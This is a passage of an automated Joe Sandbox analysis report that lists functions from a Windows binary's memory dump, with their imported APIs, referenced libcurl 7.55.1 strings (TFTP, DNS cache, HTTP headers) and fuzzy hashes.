Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: ede2baebea30e120c22f6a2023d50123c2593a40af718a3927acf8066244f778
Instruction ID: e2bfd222dc19f51d6ae5ec395dff610541f0c3df283c2e36e1a75ad234b7891d
Opcode Fuzzy Hash: ede2baebea30e120c22f6a2023d50123c2593a40af718a3927acf8066244f778
Instruction Fuzzy Hash: D8117D22618A45D3D714AF62F9A4329A330FF5CB84F481131CB1E4BA50CF3CE4789798

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D325C8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 137COMMON

Download Yara Rule

APIs

recvfrom.WS2_32 ref: 00007FF7F8D32634

Strings

Received too short packet, xrefs: 00007FF7F8D32676
Internal error: Unexpected packet, xrefs: 00007FF7F8D326EA
%s, xrefs: 00007FF7F8D3273A

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: recvfrom
String ID: %s$Internal error: Unexpected packet$Received too short packet
API String ID: 846543921-1418437813
Opcode ID: b545d1a479bdb1d52966d8b14be9174759b8c22b51c337696aaa962b0d1850a2
Instruction ID: 73be6e5e8d733fc2833a5672db730b036e3494ef7227646b04acfde4787d6909
Opcode Fuzzy Hash: b545d1a479bdb1d52966d8b14be9174759b8c22b51c337696aaa962b0d1850a2
Instruction Fuzzy Hash: 5851C671A0868285EB50AB25D8103B9F391FF48B95F984232EE6D477C8CF3DD509E7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D32810 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96networkCOMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF7F8D32843
_time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF7F8D3287B
WSAGetLastError.WS2_32 ref: 00007FF7F8D328CC

Strings

TFTP response timeout, xrefs: 00007FF7F8D32893

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: _time64$ErrorLast
String ID: TFTP response timeout
API String ID: 3339832089-3820788777
Opcode ID: c95d31db132e8219cb1e17eae8e70e8a43aaed46a855f85b39af27bbf35c9912
Instruction ID: 163842bb5fe8fb9f231a2acec1413866a9e02ad4515950420174676f78693790
Opcode Fuzzy Hash: c95d31db132e8219cb1e17eae8e70e8a43aaed46a855f85b39af27bbf35c9912
Instruction Fuzzy Hash: C541AE22A0874285E750EB25E850379E790EF8CBA0F848131DE6D477D5CF3CD445E3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D40D44 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D40DA0
isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D40E0D

Strings

true, xrefs: 00007FF7F8D40DEB
stale, xrefs: 00007FF7F8D40DD6

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: isspace
String ID: stale$true
API String ID: 3785662208-3006055996
Opcode ID: bf108ed8c1bf25e98bd3ce14e0dbbecb5219542823e6cc7ca919c13f066e7f4b
Instruction ID: a8077525219f7cc1f4bbe16f92744a601868837683a8b447e121dd74a260932e
Opcode Fuzzy Hash: bf108ed8c1bf25e98bd3ce14e0dbbecb5219542823e6cc7ca919c13f066e7f4b
Instruction Fuzzy Hash: 3331712150CA4685FFA0AF21A4103B9E390BF08B94FCC5171DAAD476C5DF3CE909A768

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D36330 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 88stringCOMMON

Download Yara Rule

APIs

strtoll.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F8D36384
__swprintf_l.LIBCMT ref: 00007FF7F8D363B0

Strings

@, xrefs: 00007FF7F8D36414
Content-Length: %I64d, xrefs: 00007FF7F8D363A0

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: __swprintf_lstrtoll
String ID: @$Content-Length: %I64d
API String ID: 2842949177-2766406558
Opcode ID: a12b2557461db6494cbfbc74bacf0d70fea610ad595cae0e8d01e4e3663e51af
Instruction ID: 63772f2d5a84fb64129000083178ab61728b2fc49d02aa9e98f2c8d457690f65
Opcode Fuzzy Hash: a12b2557461db6494cbfbc74bacf0d70fea610ad595cae0e8d01e4e3663e51af
Instruction Fuzzy Hash: B2318422A1C69585F720AB21E4002BEE694FF48BA4FD84235DEAD077D5CF38D406B7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D40C14 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D40C7B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D40CF4
isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D40D14

Strings

realm, xrefs: 00007FF7F8D40CAD

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: isspace$free
String ID: realm
API String ID: 3795756782-4204190682
Opcode ID: f2feda195b16e0f12254e1e71f1cc0114987850b4c514c672a2e277607d98bb0
Instruction ID: 136282a4e700c06d6f4d6735dacf407c4fcd33ea08147b7c8889ab4870e22bfd
Opcode Fuzzy Hash: f2feda195b16e0f12254e1e71f1cc0114987850b4c514c672a2e277607d98bb0
Instruction Fuzzy Hash: 01314F21A0CA4581EF60AF21E8103B9E390FF4C784F881175DAAD466C5DF2CE94D96A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D24654 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF7F8D464D5), ref: 00007FF7F8D246AC
__swprintf_l.LIBCMT ref: 00007FF7F8D246CF

Part of subcall function 00007FF7F8D0E5B4: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7F8D231CA,?,?,?,00007FF7F8D23369,?,?,?,00007FF7F8D0FED2), ref: 00007FF7F8D0E5DE

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF7F8D464D5), ref: 00007FF7F8D24719

Part of subcall function 00007FF7F8D0E668: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7F8D231F1,?,?,?,00007FF7F8D23369,?,?,?,00007FF7F8D0FED2), ref: 00007FF7F8D0E696
Part of subcall function 00007FF7F8D0E668: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7F8D231F1,?,?,?,00007FF7F8D23369,?,?,?,00007FF7F8D0FED2), ref: 00007FF7F8D0E6AF

Strings

%s:, xrefs: 00007FF7F8D246C5

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$malloc$__swprintf_l
String ID: %s:
API String ID: 158892512-64597662
Opcode ID: e9ad506c6c27a7294fe83e672d393d2edb0c3b1a5bad13914f5db32b8e257b0e
Instruction ID: 1c02ab4c96e002fbbc5f58f9f20ddac21e280f66286c981ce93bc9fbcd94c08d
Opcode Fuzzy Hash: e9ad506c6c27a7294fe83e672d393d2edb0c3b1a5bad13914f5db32b8e257b0e
Instruction Fuzzy Hash: 9A218D22609A8291EB10EF22E8504AAE724FF98BD4FC94131EE7D477D5DE3CD50AD394

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D191D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F8D19168: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00007FF7F8D19212,?,?,?,?,00000000,?,?,00007FF7F8D19449,00000000,?,?,00007FF7F8D1FF56), ref: 00007FF7F8D19185

_time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF7F8D1925E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,?,?,00007FF7F8D19449,00000000,?,?,00007FF7F8D1FF56), ref: 00007FF7F8D192BA

Strings

%s:%d, xrefs: 00007FF7F8D191F6
Hostname in DNS cache was stale, zapped, xrefs: 00007FF7F8D19284

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: _time64freetolower
String ID: %s:%d$Hostname in DNS cache was stale, zapped
API String ID: 489579257-2902227024
Opcode ID: ab1ed2304c45dd4d15bfc7bc2af32bf9a152f23f0596b15316bc2318ca23d281
Instruction ID: 9bef5285747b4e9ffe2c7f6ff199e11921182ba2416730975ff55fb0b8ecebfa
Opcode Fuzzy Hash: ab1ed2304c45dd4d15bfc7bc2af32bf9a152f23f0596b15316bc2318ca23d281
Instruction Fuzzy Hash: 60218222A49A4294FB50AB31A854279E350AF4CBE8FC84231DE2E077D5DF2CE4499768

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D3CD44 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D3CDCC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D3CE17

Strings

%c%03d, xrefs: 00007FF7F8D3CDA7
%s %s, xrefs: 00007FF7F8D3CDD6

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: __swprintf_lfree
String ID: %c%03d$%s %s
API String ID: 399239331-883683383
Opcode ID: b95e8a4c058bbb5882e88616f1d7c7f3a06e1938dfbf268e8ec740d8ff33e9f1
Instruction ID: 6f72d4fb5b25188faf90db5ce22e5cdeacda5bd04f0dbf93cac07b44e40013be
Opcode Fuzzy Hash: b95e8a4c058bbb5882e88616f1d7c7f3a06e1938dfbf268e8ec740d8ff33e9f1
Instruction Fuzzy Hash: C2110872B14646C3E718DB29F811998E755EB887C0F988031DA6D4BB90DF38E516D750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D45338 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7F8D45CD2), ref: 00007FF7F8D4538B
__swprintf_l.LIBCMT ref: 00007FF7F8D453B7

Strings

TUUUUUUU, xrefs: 00007FF7F8D45358
%02x:, xrefs: 00007FF7F8D453A8

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: __swprintf_lmalloc
String ID: %02x:$TUUUUUUU
API String ID: 1671605834-3311576412
Opcode ID: 22b0d585f3bc2be9592d8c370e631dd19d8e37527e3973fa074162809d6d837c
Instruction ID: b4aaaccac759b8e1e1c0229e773153575eac173600d57db94594f44b30b1140c
Opcode Fuzzy Hash: 22b0d585f3bc2be9592d8c370e631dd19d8e37527e3973fa074162809d6d837c
Instruction Fuzzy Hash: 2C01E121B0DA9A85EB11EB52B944278E360EF4CFD0F984071DE6D07B88DE78D44AC784

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D122A4 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1232C

Strings

libcurl/7.55.1 WinSSL, xrefs: 00007FF7F8D122B7, 00007FF7F8D122C9
7.55.1, xrefs: 00007FF7F8D122C3
WinSSL, xrefs: 00007FF7F8D12325

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: __swprintf_l
String ID: 7.55.1$WinSSL$libcurl/7.55.1 WinSSL
API String ID: 1488884202-1485548533
Opcode ID: b5e722d6e4550c3a6fe4071394778a2e989954348b595104c290ed9faddd702d
Instruction ID: 2e9d539184c0fe82793f814861722558802b53de4fd3baf80e1ea200d03b29c0
Opcode Fuzzy Hash: b5e722d6e4550c3a6fe4071394778a2e989954348b595104c290ed9faddd702d
Instruction Fuzzy Hash: 56114F50E0CA8AC5F755EF24B900279E790EF19370FC84236C87C465E1DE2DA58CEBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D38E40 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 00007FF7F8D38E7D
WSAGetLastError.WS2_32 ref: 00007FF7F8D38E87

Strings

SENT, xrefs: 00007FF7F8D38EA2
Sending data failed (%d), xrefs: 00007FF7F8D38E8D

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLastsend
String ID: SENT$Sending data failed (%d)
API String ID: 1802528911-3459338696
Opcode ID: cc31b0e0a4723b077441de42638e4246d96d83c0e533f940623c911a07b3cb2b
Instruction ID: 729976ef5a1066842982db42887d98ee14ea06edae873fcf2aa9f090a559047c
Opcode Fuzzy Hash: cc31b0e0a4723b077441de42638e4246d96d83c0e533f940623c911a07b3cb2b
Instruction Fuzzy Hash: 4001F532708A9281DB10AB26E400458FB20FF98FC4B895131DF2D47B55CF39D509C798

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D1D644 Relevance: 6.4, APIs: 5, Instructions: 170COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FF7F8D20410,?,?,?,?,?,?,?,?,?,?), ref: 00007FF7F8D1D677
calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1D840

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: calloc
String ID:
API String ID: 2635317215-0
Opcode ID: d61fca85e2f26253552de7d92bd639a836b333907e1a8300864bb32f709c88ae
Instruction ID: 39914a5ed92a9773111d78d89862c18eb92af1cf675ebe577f2f2df8a9b89bea
Opcode Fuzzy Hash: d61fca85e2f26253552de7d92bd639a836b333907e1a8300864bb32f709c88ae
Instruction Fuzzy Hash: 26912726609FC19AE7599F34A9503EAEBA0FF59750F480135CBBD43382DF28A078D764

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D2EA54 Relevance: 6.3, APIs: 5, Instructions: 86COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2EA8C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2EACD
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2EAEE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2EB58
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2EB6D

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$malloc
String ID:
API String ID: 2190258309-0
Opcode ID: 2e1cdd1845b81a547b8bc6720509006ef11d1e6a62c444f2414c969130b61b4c
Instruction ID: 7a341fb73f137209165c6f75aa8beeb73bbb7018dfdbb602a7c5408dae378f2b
Opcode Fuzzy Hash: 2e1cdd1845b81a547b8bc6720509006ef11d1e6a62c444f2414c969130b61b4c
Instruction Fuzzy Hash: 8E311E25A09B46C6EB24AF26F850269E360FF9DF80F984035CE5E47791DE3CE4499398

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D11218 Relevance: 6.3, APIs: 5, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 4baa3586fc67abeea6d6de94767f8e4852ea18f4046d09bbe174e9b88345fb76
Instruction ID: 69f0bf42b81a930e3b186e1a6ecb4d77393d5197cd04bb6b2f52137a14a94311
Opcode Fuzzy Hash: 4baa3586fc67abeea6d6de94767f8e4852ea18f4046d09bbe174e9b88345fb76
Instruction Fuzzy Hash: 1D111225A4DE85C2EB54AB62F950178E324FF5CB90F8C1031DE1E47B90CF2CE4599798

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D02B3C Relevance: 6.3, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02B59
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02B7E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02BA3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02BC8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02BED

Part of subcall function 00007FF7F8D0E668: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7F8D231F1,?,?,?,00007FF7F8D23369,?,?,?,00007FF7F8D0FED2), ref: 00007FF7F8D0E696
Part of subcall function 00007FF7F8D0E668: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7F8D231F1,?,?,?,00007FF7F8D23369,?,?,?,00007FF7F8D0FED2), ref: 00007FF7F8D0E6AF

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: c21e3163258db4359c98e0b08787f574f171087142a2359bd8586bcf2f5b4aba
Instruction ID: 6b9d8cc5161068ccb1333ec40de4927ae0905dfb604fe8bef988ff9422bcfa98
Opcode Fuzzy Hash: c21e3163258db4359c98e0b08787f574f171087142a2359bd8586bcf2f5b4aba
Instruction Fuzzy Hash: 0621C711A19A4A82FB05BF22F855378E3A0AF5DF54FCC0174C92D4A1D9DE6CE04CA7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D40268 Relevance: 6.3, APIs: 4, Instructions: 263stringCOMMON

Download Yara Rule

APIs

realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D403BF
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D403E8
strtoll.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F8D405E3
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D405FC

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: _errnomallocreallocstrtoll
String ID:
API String ID: 4115862152-0
Opcode ID: ac3934b59f80577bf95706b4dd1ee4f4e29e9a77cee6c38c5cad01d9a06c64a7
Instruction ID: 2984007e0f6cdf2f300225de2a9166e1cd82554001d99ac2fa28b58eb45a05b0
Opcode Fuzzy Hash: ac3934b59f80577bf95706b4dd1ee4f4e29e9a77cee6c38c5cad01d9a06c64a7
Instruction Fuzzy Hash: 38B1D82190E28286FFE0AB25905877DE794FF08750F8E5175CA7E472D0DE389888E7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D4318C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 219COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D4323C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D4344D

Strings

Excessive server response line length received, %zd bytes. Stripping, xrefs: 00007FF7F8D43408
response reading failed, xrefs: 00007FF7F8D432A8

Memory Dump Source

